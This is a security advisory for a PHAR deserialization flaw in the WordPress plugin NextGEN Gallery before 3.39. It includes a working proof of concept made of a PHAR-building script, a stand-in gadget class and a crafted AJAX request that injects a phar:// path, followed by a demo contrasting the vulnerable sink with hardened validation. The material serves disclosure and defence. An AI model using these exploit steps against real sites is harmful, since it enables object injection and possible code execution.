WordPress Plugin Vulnerabilities

NextGEN Gallery < 3.39 - Admin+ PHAR Deserialization

Description

The plugin does not validate the `tmp_name` value supplied through `extra_data` for an `upload` entry in the `gallery_edit` task and passes it to PHP filesystem functions. Because those functions honour stream wrappers, an authenticated administrator can point `tmp_name` at a `phar://` path to an archive already present on the server and have the archive's metadata unserialized, which is PHP object injection. With a suitable gadget chain on the target this can be turned into arbitrary file access or code execution.

Proof of Concept

1. Ensure the WordPress installation runs on PHP 7.4 or earlier. From PHP 8.0 on, PHAR metadata is no longer unserialized automatically when an archive is accessed through the `phar://` wrapper, so the PoC below will not trigger there.
2. Create a Gallery and note its ID.
3. Generate `poc.phar` with the following script (run it as `php -d phar.readonly=0 poc.php`, since PHP refuses to write PHAR archives while `phar.readonly` is on) and place the resulting file in the web root, i.e. the directory containing WordPress's `index.php`, which is what the relative `phar://poc.phar/...` path in step 5 resolves against:

<?php
// Generator for poc.phar. The class only needs to exist by name here so that a
// serialized Evil object can be stored as the archive metadata; the gadget
// body (step 4) lives on the target, not in this script.
// Run with: php -d phar.readonly=0 poc.php

class Evil {}

try
{
    $pharFile = 'poc.phar';

    if (file_exists($pharFile))
    {
        unlink($pharFile);
    }

    $phar = new Phar($pharFile);

    $phar->startBuffering();
        $phar->addFromString( 'test.txt', 'text' );
        // Minimal stub; the archive never needs to be executed as a program.
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        // The metadata is what gets unserialized when the phar is opened.
        $phar->setMetadata( new Evil() );
    $phar->stopBuffering();

    echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
    echo $e->getMessage();
}


4. Add the following class to a file that WordPress loads on every request before the plugin runs (for example near the top of wp-config.php). It stands in for a real gadget chain: its `__wakeup` runs as soon as the PHAR metadata is unserialized.

<?php
class Evil {
	function __wakeup() {
		die('Arbitrary deserialization');
	}
}


5. Run the following in the browser's developer console while on the target site, replacing ADMIN_USERNAME, ADMIN_PASSWORD and GALLERY_ID accordingly (`q` and `z` carry the credentials the plugin's `photocrati_ajax` endpoint expects). The `upload` entry in `image_list` refers, through `data_key`, to the `extra_data` entry whose `tmp_name` is the `phar://` path. When the plugin hands that value to a filesystem function, PHP opens the archive, unserializes its metadata and runs the gadget's `__wakeup`, so the response body reads "Arbitrary deserialization". The member name after `poc.phar/` does not need to exist: the metadata is unserialized when the archive is opened, before any member is looked up.

await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
    "method": "POST",
    "mode": "cors"
})).text();
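As an added example, not the plugin's code and not part of the original advisory, the script below reproduces the sink from the Description and the five-step PoC on a single host and puts a hardened version beside it. It builds a PHAR whose metadata is a serialized object, hands a `phar://` path to `file_exists()` the way the plugin hands `tmp_name` to a filesystem function, and shows the `__wakeup` gadget firing; the hardened check rejects the same value before any stream wrapper is consulted. The names `make_phar`, `vulnerable_sink` and `hardened_sink` and the `Evil` stand-in gadget are assumptions made for this demo. Like the PoC it needs PHP 7.4 or earlier and `phar.readonly=0` to write the archive.

```php
<?php
// Added example: not code from NextGEN Gallery or from the advisory above.
// make_phar(), vulnerable_sink() and hardened_sink() are hypothetical names.
// Run with:  php -d phar.readonly=0 phar_sink_demo.php   (PHP <= 7.4)

class Evil
{
    public static $fired = false;

    // Stand-in gadget: a real chain would end in a file write, eval, etc.
    public function __wakeup()
    {
        self::$fired = true;
        echo "[!] Evil::__wakeup ran: PHAR metadata was unserialized\n";
    }
}

// Build an archive whose metadata is a serialized Evil object.
function make_phar(string $path): void
{
    if (file_exists($path)) {
        unlink($path);
    }
    $phar = new Phar($path);
    $phar->startBuffering();
    $phar->addFromString('tmp.png', 'not an image');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();
}

// Vulnerable pattern: tmp_name goes straight to a filesystem call. Every such
// call (file_exists, is_file, filesize, copy, ...) resolves stream wrappers,
// so a phar:// path makes PHP <= 7.4 parse the archive and unserialize its
// metadata before the call returns.
function vulnerable_sink(string $tmp_name): bool
{
    return file_exists($tmp_name);
}

// Hardened pattern: refuse anything that names a stream wrapper, then confine
// the resolved path to the expected directory. A real upload handler should
// additionally require is_uploaded_file(), which is only true for files PHP
// itself created for the current request.
function hardened_sink(string $tmp_name, string $base_dir): bool
{
    // Any "scheme:" prefix (phar://, php://, data:, ...) is rejected outright.
    // On a Windows host this also rejects drive letters; adjust there.
    if (strpos($tmp_name, "\0") !== false
        || preg_match('#^[A-Za-z][A-Za-z0-9+.\-]*:#', $tmp_name)) {
        return false;
    }
    // realpath() never consults stream wrappers and returns false for paths
    // that do not exist, so no wrapper can be reached from here on.
    $real = realpath($tmp_name);
    $base = realpath($base_dir);
    if ($real === false || $base === false) {
        return false;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false; // escaped the allowed directory via symlink or ../
    }
    return is_file($real);
}

$archive        = __DIR__ . '/poc.phar';
make_phar($archive);
$attacker_value = 'phar://' . $archive . '/whatever.png'; // member name is irrelevant

vulnerable_sink($attacker_value);
echo 'vulnerable_sink: gadget fired = ' . var_export(Evil::$fired, true) . "\n";

Evil::$fired = false;
$accepted = hardened_sink($attacker_value, __DIR__);
echo 'hardened_sink(phar path): accepted = ' . var_export($accepted, true)
   . ', gadget fired = ' . var_export(Evil::$fired, true) . "\n";

// A plain file inside the allowed directory is still accepted.
echo 'hardened_sink(real file): accepted = '
   . var_export(hardened_sink($archive, __DIR__), true) . "\n";

// Defence in depth for sites that never need phar://: unregister the wrapper
// early (a mu-plugin is a good place), which removes this sink class entirely.
// stream_wrapper_unregister('phar');
```

On PHP 7.4 the first line of output reports the gadget firing from inside `file_exists()`; the hardened check returns false for the `phar://` value without the gadget running, and true for the plain file path. On PHP 8.0 or later the vulnerable call no longer fires the gadget, which is the behaviour change step 1 of the PoC refers to.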

Affects Plugins

NextGEN Gallery: fixed in 3.39

Classification

Type: OBJECT INJECTION

Miscellaneous

Original Researcher: Linwz from DEVCORE
Submitter: Linwz from DEVCORE
Verified: Yes

Timeline

Publicly Published: 2023-09-25
Added: 2023-09-25
Last Updated: 2023-09-25
